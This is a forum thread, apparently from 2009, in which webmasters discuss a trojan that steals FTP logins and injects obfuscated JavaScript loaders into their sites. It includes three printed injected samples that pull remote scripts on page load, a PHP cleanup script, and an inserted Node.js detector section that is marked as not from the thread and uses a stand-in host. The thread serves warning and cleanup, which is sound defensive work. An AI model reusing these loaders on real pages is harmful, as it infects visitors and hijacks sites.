#1
I need help
Join Date: Jun 2006
Posts: 11
hi yall
just wanted to warn you about a new hack/virus/trojan that just infected every domain that i have online on every server. basically somehow it stole my ftp accounts (i was using firezilla for 2 weeks now and this is when the trouble began, before that i was using cuteftp and didn't have any issues until then. switched to firezilla because it seems faster...this was a huge mistake). the hack is some kind of javascript that loads an encoded long piece of code at the bottom of every page. so far i've found these pieces of code in infected files: Code:
<script>/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl =
document.createElement('script');Jqjzlgspz98uxl.setAttribute('type',
'text/javascript');Jqjzlgspz98uxl.setAttribute('id', 'myscript1');Jqjzlgspz98uxl.setAttribute('src',
'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^&(c(o^#m
@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$!(s@$@i^@c
@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$
!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m
)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'.replace(/\(|\)|\^|\!|@|\$|#|&/ig,
''));Jqjzlgspz98uxl.setAttribute('defer', 'defer');document.body.appendChild(Jqjzlgspz98uxl);}}
catch(e) {}</script>
Code:
<script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 =
document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type',
'text/javascript');Hva23p3hnyirlpv7.setAttribute('id',
'myscript1');Hva23p3hnyirlpv7.setAttribute('src',
'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^
u!$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@r)#u(&#!:)
@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@!i(@&#d#)e@&o$#.^c$!#o
@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&.#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^
#c)$!o#&)@@m!/^$'.replace(/\$|\^|\!|&|\)|\(|@|#/ig, ''));Hva23p3hnyirlpv7.setAttribute('defer',
'defer');document.body.appendChild(Hva23p3hnyirlpv7);}} catch(e) {}</script>
Code:
<script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p =
document.createElement('script');H3qqea3ur6p.setAttribute('type',
'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src',
'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@
.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#
$#)t))@s#!#)a!l##e@(.))&r$!u!&)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&
^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p
$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c
!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&
#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer',
'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>
I don't know yet the source of the hack or how i got infected. The script tries to load some domain.ru script (possible trojan). I'm trying now to clean the desktop, then contact every host to change ftp passwords and ip lock on connections. As a removal tool, hosts can clean the files, and besides that I've found this php code that searches for regular expressions and removes them. Download php removal code here, original creator and instructions here. if some php guru can contact me and help me modify the script (with the regular expressions that are searched and deleted) so I can remove the code from all the infected files, please contact me asap on 175444555. I will pay you for your work. further reading on this matter can be found on this dutch thread, Translation here. Thank you and please be aware and check your online files now! If you're not infected back up everything cause this is spreading very fast. A week ago there were 3 pages in google on this matter...now there are over 10 and going up.
#2
Guest
Join Date: Oct 2005
Location: England
Posts: 7,393
Can you restrict ftp logins to your IP or IP range?
__________________
I apologise to ADX members for my constant reminders that Lord Aga and Netpond are scammers Money Bookers - now with ATM withdrawals via MasterCard
#3
Serious Contributor
Join Date: Nov 2008
Posts: 954
do u mean filezilla? never heard of firezilla.
__________________
FLASHGALS - FREE TUBE/CMS SCRIPT Automatically convert FHG into your own gallery or tube
#4
I need help
Join Date: Jun 2006
Posts: 11
filezilla sry.
here is the scan_files.php script that i'm using right now to clean files from infected domains: Code:
<?php
echo "<pre>";
set_time_limit(3600);

// never rewrite the scanner itself; skip the stats directory entirely
$exclude_files = array(
    $_SERVER['DOCUMENT_ROOT'] . '/' . 'scan_files.php',
);
$exclude_dirs = array(
    $_SERVER['DOCUMENT_ROOT'] . '/' . 'stats',
);

// ?u=1 writes cleaned files back (otherwise only reports), ?v=1 dumps before/after content.
// isset() avoids undefined-index notices when the parameters are absent.
// Anyone who can reach this URL can trigger the rewrite, so remove the script once the cleanup is done.
$update  = isset($_REQUEST["u"]) && $_REQUEST["u"] == "1";
$verbose = isset($_REQUEST["v"]) && $_REQUEST["v"] == "1";

function scan_files($dir) {
    global $exclude_files, $exclude_dirs, $update, $verbose;
    // regular expressions to search ($exp1..$exp5 are candidates; only $search is applied)
    $exp1 = '|<script>/\*GNU GPL\*/ try\{window\.onload = function\(\){(.*)</script>|imU';
    $exp2 = "</script>$";
    $exp3 = "#</script>#";
    $exp4 = "#<!-- ?\n\(function\(.*?\){var .*?unescape\(.*?\);\n -->#";
    $exp5 = "#<!-- ?\n\(function\(.*?\){eval\(unescape\(.*?\);\n -->#";
    //$search = array('|<script>/\*GNU GPL\*/|imU');
    // s: match even if the injected block is wrapped over several lines;
    // U: ungreedy, so (.*) stops at the first </script> instead of swallowing the rest of the page
    $search = array('|<script>/\*GNU GPL\*/ try\{window\.onload = function\(\){(.*)</script>|imsU');
    $dirs_array = array();
    if ($handle = opendir($dir)) {
        echo "Open dir: " . $dir . "\n";
        echo "Files:";
        // this is the correct way to loop over the directory.
        while (false !== ($file = readdir($handle))) {
            if ($file != '.' && $file != '..') {
                $path = $dir . $file;
                if (is_file($path)) {
                    // skip large files
                    if (filesize($path) > 1000000) {
                        continue;
                    }
                    // exclude files
                    if (in_array($path, $exclude_files)) {
                        continue;
                    }
                    // leave backups alone
                    if (endsWith($file, '.bak')) {
                        continue;
                    }
                    // known dropped files: delete outright in update mode
                    if (endsWith($path, '/images/image.php') ||
                        endsWith($path, '/images/gifimg.php')) {
                        echo "\n===>" . $path . "\n";
                        if ($update) {
                            unlink($path);
                        }
                        continue;
                    }
                    // get content
                    $contents = file_get_contents($path);
                    $origContents = $contents;
                    // strip every match of every search pattern
                    foreach ($search as $pattern) {
                        $contents = preg_replace($pattern, "", $contents);
                        if ($contents === null) {
                            break;
                        }
                    }
                    // preg_replace returns null on error (e.g. backtrack limit); without this
                    // check the file would be overwritten with an empty string
                    if ($contents === null) {
                        echo "\nXXX: preg_replace failed on ({$path}), file left untouched\n";
                        continue;
                    }
                    if ($contents != $origContents) {
                        echo "\n===>" . $path;
                        //echo "\n";
                        if ($update) {
                            //chmod($path, "ugo+rw");
                            /* if (!$file_handle = fopen($path . '.bak', 'w')) {
                                echo "Cannot open file ({$path}.bak)<br/>\n";
                                exit;
                            }
                            if (fwrite($file_handle, $origContents) === FALSE) {
                                echo "Cannot write to file ({$path}.bak)<br/>\n";
                                exit;
                            }
                            fclose($file_handle); */
                            if (!$file_handle = @fopen($path, 'w')) {
                                echo "\nXXX: Cannot open file ({$path})\n";
                                //continue;
                                exit;
                            }
                            if (@fwrite($file_handle, $contents) === FALSE) {
                                echo "\nXXX: Cannot write to file ({$path})\n";
                                //continue;
                                exit;
                            }
                            fclose($file_handle);
                        }
                        elseif ($verbose) {
                            echo "**********\norigContents=$origContents\n";
                            echo "**********\ncontents=$contents\n";
                        }
                    }
                } elseif (is_dir($path)) {
                    if (in_array($path, $exclude_dirs)) {
                        continue;
                    }
                    $dirs_array[] = $path;
                }
            }
        }
        closedir($handle);
    }
    // recurse after the handle is closed, so deep trees do not exhaust open directory handles
    foreach ($dirs_array as $dir) {
        scan_files($dir . '/');
    }
    unset($dirs_array);
}

function endsWith($string, $ending) {
    $len = strlen($ending);
    $string_end = substr($string, strlen($string) - $len);
    return $string_end == $ending;
}

$start_dir = $_SERVER['DOCUMENT_ROOT'] . '/';
echo 'Starting from: ' . $start_dir . "\n";
scan_files($start_dir);
?>
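As an added example (not code from the thread or from any of the posters), here is a Node.js script that does for one HTML page in memory what scan_files.php above does on disk: it finds the injected `<script>/*GNU GPL*/ try{window.onload = function(){ ... }} catch(e) {}</script>` block in post #1, strips it, and additionally decodes the obfuscated `src` so the loader host can be blocked at the proxy or reported to the hosting provider. It keys on the fixed `/*GNU GPL*/ try{window.onload` marker rather than the per-file random variable name, and it recovers the URL by reading the junk-character pattern out of the injected `.replace()` call instead of executing any of it. The sample page, the variable name `Zq9x` and the host `evil.example.invalid` are constructed for this example.

```javascript
// Added example (not from the thread or from any poster): detect the "/*GNU GPL*/" injection
// described above, strip it from a page, and decode the obfuscated src into a blockable URL.
// Node.js; the sample page, variable name Zq9x and host evil.example.invalid are constructed.

// One injected block, whatever the random variable name. [\s\S]*? crosses line breaks and stops
// at the first </script>, which is what the PHP pattern's s and U modifiers do.
const INJECTION_RE =
  /<script>\s*\/\*GNU GPL\*\/\s*try\{window\.onload = function\(\)\{[\s\S]*?<\/script>/gi;

// Inside a block the src is '<junk-laden url>'.replace(/<junk chars>/flags, '').
// Capture the three parts so the URL can be decoded without executing the script.
const SRC_RE =
  /setAttribute\('src',\s*'([^']*)'\.replace\(\/([^\/]*)\/([a-z]*),\s*''\)\)/;

// Decode the src the same way the injected code would: delete every character the junk
// alternation matches. The RegExp is rebuilt from the captured text; nothing is eval'ed.
function decodeSrc(block) {
  const m = SRC_RE.exec(block);
  if (!m) return null;
  const [, obfuscated, junkPattern, flags] = m;
  return obfuscated.replace(new RegExp(junkPattern, flags), '');
}

// Scan one page: report each injected block with its decoded loader URL and return the
// page with the blocks removed (the equivalent of scan_files.php's preg_replace step).
function scanHtml(html) {
  const findings = [];
  const cleaned = html.replace(INJECTION_RE, (block) => {
    findings.push({ decodedSrc: decodeSrc(block), bytes: block.length });
    return '';
  });
  return { infected: findings.length > 0, findings, cleaned };
}

// Hostnames to block at the proxy/firewall or report to the hosting provider.
function indicatorHosts(result) {
  const hosts = new Set();
  for (const f of result.findings) {
    if (!f.decodedSrc) continue;
    try {
      hosts.add(new URL(f.decodedSrc).hostname);
    } catch (e) {
      // src did not decode to a parseable URL; the raw value stays in findings
    }
  }
  return [...hosts];
}

// Constructed sample page carrying one injection in the thread's format.
const SAMPLE_PAGE = [
  '<html><body>',
  '<p>Welcome to the site.</p>',
  "<script>/*GNU GPL*/ try{window.onload = function(){var Zq9x = " +
    "document.createElement('script');Zq9x.setAttribute('type', 'text/javascript');" +
    "Zq9x.setAttribute('id', 'myscript1');Zq9x.setAttribute('src', " +
    "'h#t$t!p:(/)/e^v&i@l.e#x$a!m(p)l^e.i&n@v#a$l!i(d:8)0^8&0/l@o#a$d.j!s'" +
    ".replace(/\\(|\\)|\\^|\\!|@|\\$|#|&/ig, ''));Zq9x.setAttribute('defer', 'defer');" +
    "document.body.appendChild(Zq9x);}} catch(e) {}</script>",
  '</body></html>',
].join('\n');

const result = scanHtml(SAMPLE_PAGE);
console.log(JSON.stringify({ infected: result.infected, hosts: indicatorHosts(result),
                             findings: result.findings }, null, 2));
console.log(result.cleaned);
```

To run it over a real document root, read each file with `fs.readFileSync`, pass the text to `scanHtml`, and write `cleaned` back only when `infected` is true and the decoded hosts have been recorded; the recorded hosts are the indicators to hand to the host together with the request to rotate the FTP credentials.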
#6
Pimpin' Angel
Join Date: Sep 2008
Location: Paris, France
Posts: 668
How do you know you've been hit?
__________________
"Reality is wrong. Dreams are for real." Tupac Amaru Shakur (June 16th, 1971 - September 13th, 1996)
Exquisite Angelz, Home of the exquisite models, adult models & adult actresses we all fantasize!
#7
I need help
Join Date: Jun 2006
Posts: 11
first i spotted the virus code when playing with a new script and didn't know what it was. i ignored it at first, then asked the script owner what it was and what it was doing..he said no idea, not from my script.
deleted the code and moved on...until i was browsing and reached one of my sites and saw that google is blocking the site for malicious software...started to investigate and realized that the code is everywhere, on every domain i own. I went to mozilla and installed an add-on called noscript that blocks every script from every page you browse until you allow it to run....this is to protect while cleaning the mess.
#8
I love AskDamageX.com
Join Date: Oct 2009
Posts: 70
This isn't anything new folks!
It's a trojan/virus that infects your desktop. It then scans your documents & settings for the files that filezilla and other common FTP programs use to store saved passwords. If your program encrypts the passwords, it can also listen to the FTP packet stream, since FTP transmits passwords in PLAIN TEXT. DO NOT USE FTP! Use SFTP (ftp over ssh) or FTPSSL to make sure your FTP connection to your server is secure and your password isn't being sent over the internet unencrypted in plain text. Make sure that any program you use that has a "save passwords" feature stores those passwords in an encrypted format that can't be read by malware.
#9
Serious Contributor
Join Date: Jan 2008
Posts: 670
Quote:
is that virus "special" for FILEZILLA or does that read all the info on your PC and then sends it to the "new owners"?
__________________
~~~~ My Sweet Ebony ~~~~ Asian Gay Special ~~~~ - Learn How to Make Money - Fast and Reliable Web Hosting - ICQ# 169833797
#14
Great White North
Join Date: Jan 2009
Posts: 513
This is the 3rd or 4th thread I've seen with guys getting all their accounts fuxor'd by using Filezilla.
Stop using it, use a real solution.
__________________
linkspun - Premier Adult Link Trade Community - ICQ - 464/\281/\250
#15
I love AskDamageX.com
Join Date: Oct 2009
Posts: 70
Filezilla works perfectly fine, there is a setting you can toggle that will let you store your password encrypted, and you can use SFTP instead of FTP.
Personally, I run a Mac, so I use CyberDuck for my file-transfer program, and I just enter my URLs as sftp://domain.com instead of ftp://domain.com. sftp uses port 22, same as SSH, and requires an SSH account, so you may need to request one for access from your host. I don't even have FTP servers installed on any of my boxes, I just simply run SSHD and use SFTP.
#16
I love AskDamageX.com
Join Date: Oct 2009
Posts: 70
Quote:
It reads the data from multiple FTP programs. I'll try to find the stuff I read about it... edit: found it: http://www.webhostingtalk.com/showthread.php?t=887539 Last edited by mBishop; December 10th, 2009 at 03:16 PM.
#18
Complete fucking amateur
Join Date: Apr 2008
Location: Out dogging
Posts: 464
Cyberwurx has this, they call it Paranoid mode - it restricts ftp login to only those IPs that have logged into the user account. Won't help in this case though.
__________________
filthybritishporn
#19
Pimpin' Angel
Join Date: Sep 2008
Location: Paris, France
Posts: 668
Do you know how to set up Filezilla with SFTP? Sorry if it sounds noob.
__________________
"Reality is wrong. Dreams are for real." Tupac Amaru Shakur (June 16th, 1971 - September 13th, 1996)
Exquisite Angelz, Home of the exquisite models, adult models & adult actresses we all fantasize!